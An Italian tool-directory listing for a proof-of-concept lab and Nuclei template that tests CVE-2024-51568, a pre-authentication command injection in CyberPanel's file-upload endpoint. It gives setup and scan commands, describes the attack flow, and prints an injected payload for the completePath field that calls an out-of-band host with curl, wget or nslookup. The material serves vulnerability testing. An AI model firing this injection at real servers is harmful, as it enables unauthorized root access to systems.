Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template — Ambiente proof-of-concept e template Nuclei per il test di CVE-2024-51568, una vulnerabilità di iniezione di comandi pre-autenticazione in CyberPanel, che consente l'esecuzione remota di codice con privilegi di root. | Kitploit
Strumenti/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneLab e Pratica
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

Ambiente proof-of-concept e template Nuclei per il test di CVE-2024-51568, una vulnerabilità di iniezione di comandi pre-autenticazione in CyberPanel, che consente l'esecuzione remota di codice con privilegi di root.

Vedi Repository
1131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-51568 - Proof of Concept per Iniezione di Comandi in CyberPanel

Un ambiente proof-of-concept e un template Nuclei per testare CVE-2024-51568, una vulnerabilità critica di iniezione di comandi pre-autenticazione in CyberPanel.

Dettagli della Vulnerabilità

  • CVE: CVE-2024-51568
  • Gravità: Critica (CVSS 9.8)
  • Tipo: Iniezione di comandi pre-autenticazione
  • Endpoint: /filemanager/upload
  • Parametro: completePath
  • Impatto: Esecuzione di codice remoto con privilegi di root

Avvio Rapido

1. Avvia l'ambiente vulnerabile

root@kitploit:~
cd docker/
docker-compose up -d --build

2. Verifica che CyberPanel sia in esecuzione

root@kitploit:~
curl -I http://localhost:8090

3. Testa la vulnerabilità

root@kitploit:~
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

Output di esempio:

root@kitploit:~
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.

Come Funziona

La Vulnerabilità

CyberPanel v2.3.4 contiene un difetto di iniezione di comandi nella funzionalità di upload dei file:

  1. Endpoint: POST /filemanager/upload
  2. Parametro: completePath nei dati multipart del form
  3. Iniezione: I comandi vengono eseguiti tramite ProcessUtilities.outputExecutioner()
  4. Bypass: Nessuna autenticazione richiesta a causa del bypass del middleware

Template Nuclei:

  1. Estrae il token CSRF dalla richiesta GET iniziale
  2. Invia un upload di file malevolo con comando iniettato in completePath
  3. Usa Interactsh per il rilevamento out-of-band (callback HTTP/DNS)
  4. Rileva l'esecuzione riuscita quando il server contatta l'URL Interactsh

Payload di Rilevamento

root@kitploit:~
/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

Questo payload garantisce un rilevamento affidabile su diverse configurazioni di sistema.

Configurazione

Accesso a CyberPanel

  • URL: http://localhost:8090
  • Admin: admin
  • Password: 1234567

Riferimenti

  • Ricerca Originale
  • Modulo Metasploit
  • Dettagli CVE

Avviso di Sicurezza

Questo ambiente contiene vulnerabilità intenzionali per ricerca e formazione sulla sicurezza:

  • NON distribuire in produzione
  • NON esporre a reti pubbliche
  • NON utilizzare su sistemi di cui non sei proprietario
  • UTILIZZARE solo per test di sicurezza autorizzati

Dichiarazione di Esclusione di Responsabilità

Questo proof-of-concept è fornito solo per scopi educativi e di test di sicurezza autorizzati. Gli utenti sono responsabili del rispetto delle leggi applicabili e di ottenere la dovuta autorizzazione prima di effettuare test.

Scarica lo strumento